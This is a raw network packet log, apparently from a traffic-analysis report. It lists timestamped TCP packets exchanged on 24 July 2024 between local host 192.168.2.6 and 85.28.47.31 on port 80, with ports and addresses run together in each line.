                                                                                        Jul 24, 2024 07:14:20.386077881 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.386105061 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.386137962 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.386158943 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.386189938 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.386223078 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.386305094 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.386337996 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.386370897 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.386400938 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.386420012 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.386445999 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.386528015 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.386795044 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.386828899 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.386851072 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.386882067 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.386915922 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.386935949 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.386960983 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.386986971 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.387021065 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.387053967 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.387082100 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.387101889 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.387128115 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.387160063 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.387192011 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.387212992 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.387243986 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.387276888 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.387296915 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.387326002 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.387433052 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.387734890 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.387768030 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.387789011 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.387806892 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.387836933 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.387870073 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.387902975 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.387934923 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.387955904 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.387976885 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.388005018 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.388040066 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.388072014 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.388092041 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.388117075 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.388142109 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.388174057 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.388207912 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.388227940 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.388319016 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.388665915 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.388700008 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.388720989 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.388770103 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.388811111 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.388828993 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.388828993 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.388848066 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.388878107 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.388911009 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.388942957 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.388974905 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.388995886 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.389018059 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.389045000 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.389076948 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.389110088 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.389130116 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.389159918 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.389283895 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.389611006 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.389645100 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.389663935 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.389688969 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.389714956 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.389748096 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.389780998 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.389801025 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.389820099 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.389848948 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.389882088 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.389914989 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.389934063 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.389964104 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.389997959 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.390032053 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.390050888 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.390081882 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.390135050 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.390482903 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.390517950 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.390548944 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.390582085 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.390604019 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.390628099 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.390655041 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.390687943 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.390721083 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.390760899 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.390783072 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.390801907 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.390985012 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.473782063 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.473871946 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.473923922 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.473958969 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.474011898 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.474050999 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.474066019 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.474097967 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.474133015 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.474155903 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.474246979 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.474286079 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.474319935 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.474351883 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.474373102 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.474404097 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.474437952 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.474461079 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.474492073 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.474514008 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.474544048 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.474575996 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.474611044 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.474630117 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.475003004 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.475019932 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.475048065 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.475080013 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.475112915 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.475135088 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.475183964 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.475218058 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.475240946 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.475264072 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.475305080 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.475339890 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.475372076 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.475405931 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.475426912 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.475457907 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.475491047 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.475523949 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.475553036 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.475578070 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.475599051 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.475627899 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.475661993 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.475694895 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.475718021 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.476226091 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.476260900 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.476289034 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.476315975 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.476347923 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.476367950 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.476397038 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.476418018 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.476439953 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.476469040 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.476515055 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.476545095 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.476577997 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.476610899 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.476632118 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.476661921 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.476696014 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.476713896 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.476747036 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.476768970 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.477202892 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.477236986 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.477268934 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.477288008 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.477327108 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.477360964 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.477401018 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.477415085 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.477447033 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.477479935 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.477499962 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.477530003 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.477555037 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.477575064 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.477602959 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.477638960 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.477672100 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.477693081 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.477731943 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.477803946 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.477921963 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.478154898 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.478188038 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.478219986 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.478245974 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.478274107 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.478292942 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.478326082 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.478358984 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.478391886 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.478413105 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.478442907 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.478475094 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.478496075 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.478524923 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.478558064 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.478578091 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.478607893 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.478638887 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.478658915 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.478691101 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.479095936 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.479147911 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.479181051 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.479206085 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.479231119 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.479254961 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.479288101 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.479307890 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.479337931 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.479370117 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.479391098 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.479420900 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.479451895 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.479485035 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.479505062 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.479553938 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.479585886 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.479607105 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.479624987 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.479681015 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.480190039 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.480222940 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.480248928 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.480302095 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.480334997 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.480355024 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.480386019 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.480418921 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.480452061 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.480470896 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.480535984 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.480568886 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.480588913 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.480618954 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.480650902 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.480670929 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.480700970 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.480747938 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.480768919 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.481115103 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.481323004 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.481357098 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.481390953 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.481414080 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.481442928 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.481467009 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.481498957 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.481532097 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.481554985 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.481586933 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.481631041 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.481653929 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.481684923 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.481719971 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.481743097 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.481772900 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.481806040 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.481827021 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.481857061 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.481878996 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.481910944 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.482105017 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.548841000 CEST44349716173.222.162.64192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.548909903 CEST49716443192.168.2.6173.222.162.64
                                                                                        Jul 24, 2024 07:14:20.564476967 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.564510107 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.564519882 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.564541101 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.564558983 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.564630032 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.564724922 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.564735889 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.564744949 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.564755917 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.564764977 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.564783096 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.564796925 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.565162897 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.565174103 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.565186024 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.565197945 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.565208912 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.565217018 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.565227032 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.565236092 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.565252066 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.565277100 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.565434933 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.565474987 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.565485954 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.565496922 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.565526009 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.565547943 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.565696955 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.565706968 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.565759897 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.565774918 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.565815926 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.565828085 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.565835953 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.565848112 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.565856934 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.565865993 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.565874100 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.565881968 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.565890074 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.565901041 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.565905094 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.565915108 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.565921068 CEST804971185.28.47.31192.168.2.6
